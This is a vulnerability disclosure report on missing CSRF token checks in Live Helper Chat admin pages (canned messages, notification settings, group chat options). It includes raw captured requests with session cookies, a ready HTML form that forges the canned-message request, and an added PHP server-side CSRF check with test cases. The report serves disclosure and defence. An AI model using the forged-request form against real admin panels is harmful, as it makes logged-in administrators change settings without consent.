Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Status: Valid

Reported on Jan 14th 2022


Description

A CSRF issue was found in Settings > Live help configuration > Canned Messages: no CSRF token is sent with the request, so no server-side CSRF token validation takes place. In addition, the canned-message statistics are generated through a GET request that carries no CSRF token.

Two more instances where CSRF token validation is not performed were found: the Notification settings page (Settings > Live help configuration > Notification settings) and the Group chat options page (Settings > Live help configuration > Group chat option).

Proof of Concept

Request for canned messages

POST /site_admin/chat/newcannedmsg HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 526
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/newcannedmsg
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=5j5o8v6g4ut9ci9bsc07kuco6f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Title=abcd&Tags=abcd&ExplainHover=&Delay=0&Position=0&cannedDepartmentGroup=0&Message=&FallbackMessage=&HTMLSnippet=&MessageExtFB=&FallbackMessageExtFB=&repetitiveness=0&active_from=2022-01-13T11%3A41&active_to=2022-01-13T11%3A41&modStartTime=00%3A00&modEndTime=00%3A00&tudStartTime=00%3A00&tudEndTime=00%3A00&wedStartTime=00%3A00&wedEndTime=00%3A00&thdStartTime=00%3A00&thdEndTime=00%3A00&frdStartTime=00%3A00&frdEndTime=00%3A00&sadStartTime=00%3A00&sadEndTime=00%3A00&sudStartTime=00%3A00&sudEndTime=00%3A00&Save_action=Save

Note that no CSRF token is sent along with this request.

Another request, the one that generates statistics, is made with the GET method and likewise carries no CSRF token.

GET /site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Request to the notification settings endpoint, where the csfr_token field is submitted empty and is not validated.


POST /site_admin/notifications/settings HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/notifications/settings
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&enabled=on&subject=&http_host=demo.livehelperchat.com&icon=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&badge=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&vibrate=&public_key=%22%3E%3Cabcdddd&private_key=%22%3E%3Cabbbcd&StoreOptions=Save

Request to the group chat options endpoint, where the csfr_token field is again submitted empty and is not validated.


POST /site_admin/groupchat/options HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/groupchat/options
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&supervisor=3&StoreOptions=Save

Below is an example PoC page for the canned-message request above.

CSRF PoC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/chat/newcannedmsg" method="POST">
      <input type="hidden" name="Title" value="abcd" />
      <input type="hidden" name="Tags" value="abcd" />
      <input type="hidden" name="ExplainHover" value="" />
      <input type="hidden" name="Delay" value="0" />
      <input type="hidden" name="Position" value="0" />
      <input type="hidden" name="cannedDepartmentGroup" value="0" />
      <input type="hidden" name="Message" value="" />
      <input type="hidden" name="FallbackMessage" value="" />
      <input type="hidden" name="HTMLSnippet" value="" />
      <input type="hidden" name="MessageExtFB" value="" />
      <input type="hidden" name="FallbackMessageExtFB" value="" />
      <input type="hidden" name="repetitiveness" value="0" />
      <input type="hidden" name="active&#95;from" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="active&#95;to" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="modStartTime" value="00&#58;00" />
      <input type="hidden" name="modEndTime" value="00&#58;00" />
      <input type="hidden" name="tudStartTime" value="00&#58;00" />
      <input type="hidden" name="tudEndTime" value="00&#58;00" />
      <input type="hidden" name="wedStartTime" value="00&#58;00" />
      <input type="hidden" name="wedEndTime" value="00&#58;00" />
      <input type="hidden" name="thdStartTime" value="00&#58;00" />
      <input type="hidden" name="thdEndTime" value="00&#58;00" />
      <input type="hidden" name="frdStartTime" value="00&#58;00" />
      <input type="hidden" name="frdEndTime" value="00&#58;00" />
      <input type="hidden" name="sadStartTime" value="00&#58;00" />
      <input type="hidden" name="sadEndTime" value="00&#58;00" />
      <input type="hidden" name="sudStartTime" value="00&#58;00" />
      <input type="hidden" name="sudEndTime" value="00&#58;00" />
      <input type="hidden" name="Save&#95;action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability lets an attacker who lures a logged-in administrator onto a malicious page create canned messages and change notification settings and group chat options on that administrator's behalf.
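The three captured requests share one root cause: the server accepts a state change whether or not a valid token accompanies it (two of them even carry an empty csfr_token field). The following PHP is an added example, not Live Helper Chat's own code, of a server-side check such an endpoint could run before applying a change. It keeps the field name csfr_token exactly as it appears in the captured bodies; the csrf_check() function, its signature, the session handling and the sample header sets are assumptions constructed for the demonstration.

```php
<?php
// Added example, not Live Helper Chat code: a server-side gate for
// state-changing admin requests. The field name 'csfr_token' is taken from the
// captured request bodies; csrf_check() and the session handling are assumed.
declare(strict_types=1);

const CSRF_FIELD = 'csfr_token';

/** Issue a fresh per-session token (store it in the session, emit it in every form). */
function csrf_issue_token(): string
{
    return bin2hex(random_bytes(32));
}

/**
 * Decide whether a state-changing request may proceed.
 *
 * @param array<string,string> $server  the relevant $_SERVER entries
 * @param array<string,mixed>  $post    the submitted form fields ($_POST)
 * @param string|null          $session the token stored in the user's session
 * @return array{0:bool,1:string}       [allowed, reason]
 */
function csrf_check(array $server, array $post, ?string $session): array
{
    // 1. Anything that modifies data must be a POST. A GET that changes state
    //    can be triggered by a plain <img src> or link, so no token can protect it.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return [false, 'state-changing action must use POST'];
    }

    // 2. Defence in depth: browsers that send Fetch Metadata say whether the
    //    request came from another site. 'same-site' is rejected as well, since
    //    a sibling subdomain is not trusted for admin actions.
    $site = $server['HTTP_SEC_FETCH_SITE'] ?? null;
    if ($site !== null && !in_array($site, ['same-origin', 'none'], true)) {
        return [false, "cross-site request (Sec-Fetch-Site: $site)"];
    }

    // 3. Defence in depth: when an Origin header is present its host must be
    //    ours. (Compare host:port as well if the site runs on a non-default port.)
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null
        && parse_url($origin, PHP_URL_HOST) !== ($server['HTTP_HOST'] ?? '')) {
        return [false, 'Origin does not match Host'];
    }

    // 4. The token itself. The captured requests show "csfr_token=" with an empty
    //    value being accepted; an absent or empty token must fail closed, and the
    //    comparison must be constant-time.
    $submitted = $post[CSRF_FIELD] ?? '';
    if (!is_string($submitted) || $submitted === '' || $session === null || $session === '') {
        return [false, 'missing CSRF token'];
    }
    if (!hash_equals($session, $submitted)) {
        return [false, 'CSRF token mismatch'];
    }
    return [true, 'ok'];
}

// --- Constructed demonstration (sample values, not captured traffic) ---------
$session = csrf_issue_token();
$sameOriginHeaders = [
    'REQUEST_METHOD'      => 'POST',
    'HTTP_HOST'           => 'demo.livehelperchat.com',
    'HTTP_ORIGIN'         => 'https://demo.livehelperchat.com',
    'HTTP_SEC_FETCH_SITE' => 'same-origin',
];

// (a) Shape of the captured notification-settings request: empty token.
[$ok, $why] = csrf_check($sameOriginHeaders,
    ['csfr_token' => '', 'enabled' => 'on', 'StoreOptions' => 'Save'], $session);
echo "empty token:      " . ($ok ? 'allowed' : "rejected ($why)") . PHP_EOL;

// (b) Same body submitted from a page on another site with a guessed token: the
//     browser sets Origin and Sec-Fetch-Site itself, so the header gate fires first.
$crossSite = ['HTTP_ORIGIN' => 'https://attacker.example',
              'HTTP_SEC_FETCH_SITE' => 'cross-site'] + $sameOriginHeaders;
[$ok, $why] = csrf_check($crossSite,
    ['csfr_token' => str_repeat('0', 64), 'supervisor' => '3'], $session);
echo "cross-site:       " . ($ok ? 'allowed' : "rejected ($why)") . PHP_EOL;

// (c) A state change attempted over GET is refused before any token is examined.
[$ok, $why] = csrf_check(['REQUEST_METHOD' => 'GET'] + $sameOriginHeaders, [], $session);
echo "GET state change: " . ($ok ? 'allowed' : "rejected ($why)") . PHP_EOL;

// (d) Legitimate same-origin form carrying the session's own token.
[$ok, $why] = csrf_check($sameOriginHeaders,
    ['csfr_token' => $session, 'supervisor' => '3'], $session);
echo "valid token:      " . ($ok ? 'allowed' : "rejected ($why)") . PHP_EOL;
```

Run it with `php csrf_check.php`; cases (a) to (c) print "rejected" with the reason and only (d) prints "allowed". The order of the checks matters: the method and header tests are cheap and reject the cross-site case even if a token value were somehow known, while the token test remains the authoritative control for older browsers that send neither Origin nor Sec-Fetch-Site.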

We are processing your report and will contact the livehelperchat team within 24 hours.
shubh123-tri modified the report.
We have contacted a member of the livehelperchat team and are waiting to hear back.
Remigijus Kiminas validated this vulnerability.
shubh123-tri has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Remigijus Kiminas marked this as fixed in 2.0 with commit c2fa19.
The fix bounty has been dropped.
This vulnerability will not receive a CVE.

Remigijus (Maintainer):

The statistic URL was not changed, as it gets data and does not modify it.